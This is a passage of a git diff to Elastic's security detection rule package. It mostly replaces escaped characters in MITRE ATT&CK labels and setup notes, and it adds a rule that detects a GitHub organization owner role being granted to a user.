b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json index 35fa8b39ba4..ecd6f1e43d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_106.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json index 5dc109ee848..8b620b9ca95 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_107.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json index 6191d4e92cc..d0d1c5862ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_108.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json index 80ee361a862..8c153c58da2 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json +++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_4.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json index 70dce9764c7..ec7333a0a6e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json +++ b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_5.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json index ecfbcb58697..4fc14bed037 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_103.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json index a5d87374b6b..7f4bf96e61a 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_104.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json index 763df516a98..345cb8302b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_105.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json index 32477373a06..b0ee58dabce 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_106.json @@ -60,7 +60,7 @@ ], "risk_score": 47, "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -133,7 +133,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json index 41d8c073c4e..4192fe03f44 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9a5b4e31-6cde-4295-9ff7-6be1b8567e1b_107.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -132,7 +132,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json index af8ef7334f9..224100854d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_103.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json index a096603be93..87f8939cbe7 100644 --- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_104.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json index 1943de6d60c..3cdae390799 100644 --- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_105.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json index 8346498b246..b0681e77787 100644 --- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_106.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json index a6a642f7fe6..f8db4f10cda 100644 --- a/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9aa0e1f6-52ce-42e1-abb3-09657cee2698_107.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json index 167d33c824d..23f5b31e318 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_2.json b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_2.json new file mode 100644 index 00000000000..40cb7874e7e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9b343b62-d173-4cfd-bd8b-e6379f964ca4_2.json @@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects when a member is granted the organization owner role of a GitHub organization. This role provides admin level privileges. Any new owner role should be investigated to determine its validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings.", + "from": "now-9m", + "index": [ + "logs-github.audit-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GitHub Owner Role Granted To User", + "query": "iam where event.dataset == \"github.audit\" and event.action == \"org.update_member\" and github.permission == \"admin\"\n", + "related_integrations": [ + { + "package": "github", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "github.permission", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9b343b62-d173-4cfd-bd8b-e6379f964ca4", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Github" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "9b343b62-d173-4cfd-bd8b-e6379f964ca4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json index 461ad166852..66bcd322bee 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_104.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json index f9937e16c47..cf896778c6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_105.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json index d3b59b5fedf..bb9fa8c4db6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_106.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json index 3eacdc89702..d22d70755c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_107.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json index f818f812655..cc4d38e81a1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c_108.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json index 5dae4f3d062..100b9aa52c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9c260313-c811-4ec8-ab89-8f6530e0246c_103.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", - "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "For Windows systems using Auditbeat, this rule requires adding 